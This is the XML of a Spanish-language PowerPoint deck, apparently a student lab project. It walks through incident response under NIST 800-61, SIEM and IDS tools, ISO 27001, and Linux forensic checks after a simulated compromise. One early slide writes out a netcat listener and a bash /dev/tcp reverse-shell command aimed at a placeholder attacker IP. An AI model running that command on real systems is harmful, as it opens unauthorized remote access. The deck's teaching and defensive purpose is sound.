            <a:ext cx="6220326" cy="42246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Ejecución de un reverse Shell, para obtener acceso remoto al sistema.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El objetivo de reverse Shell es cargar un script malicioso en el servidor. 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Utilizamos: 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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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lvnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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4444  # Escucha en tu máquina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en la maquina comprometida ejecutamos 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bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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-i &gt;&amp; /</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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/[TU_IP]/4444 0&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="18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52AD1CE2-D1C5-D466-5A6E-24D7C23E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" y="1421054"/>
            <a:ext cx="5118353" cy="2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C6A7-388A-1FC9-3819-B0F0F9D6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FASE 3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FF4B3-C233-85A8-3264-B51B966E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b="1" dirty="0"/>
              <a:t>Plan de Respuesta a Incidentes (PRI) basado en NIST</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3200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596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D2F20-E9F9-6649-52E9-0A770A75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b="1" dirty="0"/>
              <a:t>Introducción</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Descripción del plan de respuesta a incidentes para proteger sistemas críticos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Basado en el NIST 800-61.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Objetivo: Minimizar el impacto de incidentes de seguridad.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71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9328D-2AE2-19EB-2EDB-0A9EACB4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677"/>
            <a:ext cx="10515600" cy="496018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sz="3200" b="1" dirty="0"/>
              <a:t>Roles y Responsabilidades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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dirty="0"/>
              <a:t>Equipo de Respuesta a Incidentes (CSIRT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>: Detección, análisis y mitigación de incidentes.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dirty="0"/>
              <a:t>Administrador de Sistemas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>: Asegura la disponibilidad y configuración segura de los servidores.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b="1" dirty="0"/>
              <a:t>Encargado de Seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>: Define políticas y estrategias de prevención.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062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30657-EC9F-D8EC-8C54-950CDB59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42" y="429961"/>
            <a:ext cx="10423358" cy="5152691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>Fases del Plan de Respuesta a Incidentes</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Implementación de herramientas de monitoreo (SIEM, IDS/IPS).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Recolección de logs desde múltiples fuentes.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Correlación de eventos, generación de alertas.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Análisis forense y cumplimiento normativo.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610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23E22-C021-A9B3-50D1-0B3CD597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MX" sz="3200" b="1" dirty="0"/>
              <a:t>Herramientas SIEM Populares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-MX" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" dirty="0"/>
              <a:t>: Costoso pero muy utilizado.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b="1" dirty="0"/>
              <a:t>IBM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>QRadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" dirty="0"/>
              <a:t>: Potente en correlación de eventos.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b="1" dirty="0" err="1"/>
              <a:t>Elastic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0"/>
              <a:t> Security (ELK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" dirty="0"/>
              <a:t>: Open-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" dirty="0" err="1"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" dirty="0"/>
              <a:t>.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b="1" dirty="0" err="1"/>
              <a:t>AlienVault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0"/>
              <a:t> USM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" dirty="0"/>
              <a:t>: De AT&amp;T.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-MX" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0"/>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>Sentinel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3200" dirty="0"/>
              <a:t>: Nativo de Azure.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3373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8986A-03DE-AFE1-FC71-99C70CD9A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9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s-MX" b="1" dirty="0"/>
              <a:t>IDS/IPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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IDS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Detecta y alerta sobre ataques.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IPS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Detecta y bloquea amenazas.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Funciones clave: Monitoreo, firmas y heurística, integración con SIEM.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8184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1082DA-41DD-5FFD-C2B0-E4C702DD6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b="1" dirty="0"/>
              <a:t>Herramientas IDS/IPS Populares</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" dirty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err="1"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Open-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> y muy utilizado.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Suricata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Más avanzado que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Snort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err="1"/>
              <a:t>Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Bro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Fuerte en análisis de tráfico.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Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Firepower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Solución comercial con integración en firewalls.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Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: IPS avanzado integrado en firewalls.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282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EA4F9-3065-8E46-B84D-1A0071D8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436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s-ES" b="1" dirty="0"/>
              <a:t>Contención - Aislamiento de Sistemas</a:t>
            </a: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Objetivo: Evitar propagación del ataque.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Acciones clave: Desconectar sistemas comprometidos, bloquear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> sospechosas, deshabilitar cuentas comprometidas, redirigir tráfico malicioso.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785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3BB9C-2E85-B5E6-B961-6ADF22FE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IDENTIFICACIÓN DE SERVICIOS COMPROMETIDOS</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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CC85B-AFF7-0058-6E91-DB9D48F5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987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los logs muestran accesos no autorizados, se verifica que servicios están ejecutándose en ese momento a la maquina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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 descr="Un conjunto de letras blancas en un fondo blanco&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC84E441-0C9F-1269-014A-343C6531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0432"/>
            <a:ext cx="10576770" cy="27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6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A9BF2-9059-F48F-EF0B-7BEDFA31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s-ES" b="1" dirty="0"/>
              <a:t>Erradicación - Eliminación de Malware</a:t>
            </a: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Limpiar sistemas comprometidos para evitar reinfecciones.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Acciones clave: Análisis forense, eliminar malware, revocar accesos no autorizados, aplicar parches y actualizaciones.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3478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936BA-1E71-1BAE-06D6-25F4D376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497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s-ES" b="1" dirty="0"/>
              <a:t>Recuperación - Restauración de Sistemas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Objetivo: Restaurar sistemas desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>backups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> seguros.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Acciones clave: Restaurar desde copias de seguridad confiables, verificar integridad de archivos, monitorear sistemas restaurados.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3286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35F4B-4304-68AA-00E2-854DF4BA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D4ADE-E651-2F6C-F0D0-8ED8C0A9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Sistema de Gestión de Seguridad de la Información (SGSI)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Basado en ISO/IEC 27001.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Define políticas y procedimientos para gestionar la seguridad de la información.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265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7D08F-C62D-B14D-F84A-7240CBEF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92504"/>
            <a:ext cx="10455442" cy="64649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Objetivos del SGSI según ISO 27001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Confidencialidad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Integridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Disponibilidad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Política de seguridad de la información.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Evaluación de riesgos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Control de acceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Gestión de incidentes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cumplimiento normativo y legal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Control de comunicaciones y operaciones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Gestión de la continuidad del negocio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Mejora continua.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95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B09B9-4E43-31AC-B795-4545F905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0515600" cy="58400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Fases de Implementación de un SGSI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>Planificación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Definir objetivos y alcance.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Identificación de riesgos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Análisis de amenazas y vulnerabilidades.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Implementación de controles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Cifrado, políticas de contraseñas, etc.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Monitoreo y revisión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Auditorías periódicas.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Mejora continua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: Evaluación y ajustes del SGSI.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2486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32E87-A6A6-4661-BE55-D0615840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Beneficios de Implementar un SGSI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Gestión de riesgos de seguridad.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Cumplimiento de regulaciones.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Confianza en clientes y socios.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Mejora continua.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Protección de la reputación.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430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FEAE-C726-98CF-0D0A-89BA4B7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045"/>
            <a:ext cx="10515600" cy="1046580"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-MX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IDENTIFICAMOS ARCHIVOS SOSPECHOSOS Y PROCESOS EN EJECUCIÓN Y MODIFICACIONES INUSUALES </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-MX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MX" sz="4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B81B4-0A66-B2EE-6776-C0E08A73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2" y="1825625"/>
            <a:ext cx="6541168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Revisa directorios clave para detectar cualquier archivo modificado o creado por el atacante. Se Buscan archivos con fechas de modificación inusuales y se revisa directorios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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 -</a:t>
            </a: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mtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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-7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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Como podemos observar si encuentran los directorios a los que el atacante a modificado o creado. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-MX" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3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BE1BC317-B1C6-9568-8580-243C8441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59" y="1302335"/>
            <a:ext cx="4260973" cy="50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EFF4-1801-FECD-820E-CD39D573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336" y="628065"/>
            <a:ext cx="5177589" cy="5601869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buscar procesos no autorizados o reconocidos utilizamos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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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4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aux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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=-%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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cpu</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="2400" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="15608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Aquí podemos observar la actividad del atacante que no están reconocidos.</a:t>
            </a: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endParaRPr lang="es-MX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endParaRPr lang="es-MX" sz="2400" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="15608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endParaRPr lang="es-MX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4" name="Imagen 3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2E2D0FF7-0CEC-80B0-4F09-8C8A89D5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8" y="754462"/>
            <a:ext cx="4985084" cy="53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6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B52D3-AC41-8FFF-9B72-A346CCA7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819" y="685424"/>
            <a:ext cx="4423611" cy="5487152"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-MX" sz="2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verificar si el atacante ha creado tareas programadas utilizamos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crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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-l</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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-la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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s-MX" sz="20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s-MX" sz="2000" b="1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cron.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1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endParaRPr lang="es-MX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0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s-MX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dirty="0"/>
              <a:t>Como se puede observar, hay archivos con tareas programadas del sistema en general. </a:t>
            </a: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EA0A7230-2F4F-6DB7-E356-43A0DC6F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784384"/>
            <a:ext cx="5531678" cy="27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6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B03203-ABC4-5715-E338-6A491E28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105" y="1400911"/>
            <a:ext cx="4951695" cy="5005136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usar e instalar esta herramienta de detección de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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utilizamos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rkhunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2400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</a:t>
            </a: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MX" sz="2400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chkrootkit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8438A396-ED0A-E168-712B-0B5C509F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7" y="1400911"/>
            <a:ext cx="5612130" cy="47028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A0E16B-F2AA-AF70-E16A-56DC0941FE77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4251438"/>
            <a:ext cx="6096000" cy="1205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Estas herramientas ayudan a identificar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rootkits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comunes y malwares en el servidor.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7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6DABE45E-1064-A948-049C-40E5354F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79" y="195725"/>
            <a:ext cx="5197642" cy="64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B8DFC-1FE6-0F4A-CAB5-4ECB54CF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Bloquear el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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prevenir la escalación</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="6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ED9CD-2DA6-CF05-7EEF-2F33AD74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detener temporalmente los servicio comprometidos, utilizamos </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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systemctl</a:t>
            </a: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stop &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" kern="100" dirty="0" err="1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nombre_servicio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15608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indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-MX" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="156082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470539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1407</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>182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Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Galería</vt:lpstr>
      <vt:lpstr>Fases 1, 2 y 3</vt:lpstr>
      <vt:lpstr>Corrección de un hakeo</vt:lpstr>
      <vt:lpstr>IDENTIFICACIÓN DE SERVICIOS COMPROMETIDOS</vt:lpstr>
      <vt:lpstr>IDENTIFICAMOS ARCHIVOS SOSPECHOSOS Y PROCESOS EN EJECUCIÓN Y MODIFICACIONES INUSUALES  </vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Bloquear el exploit y prevenir la escalación</vt:lpstr>
      <vt:lpstr>Revertir los cambios realizados por el ataque  </vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Conclusión </vt:lpstr>
      <vt:lpstr>FASE 2 </vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>SIMULACION DE UN ATAQUE DE FUERZA BRUTA SOBRE SSH </vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>FASE 3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Antonio Izaguirre Casillas</dc:creator>
  <cp:lastModifiedBy>Marco Antonio Izaguirre Casillas</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-17T23:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-18T06:04:45Z</dcterms:modified>
</cp:coreProperties>
</file>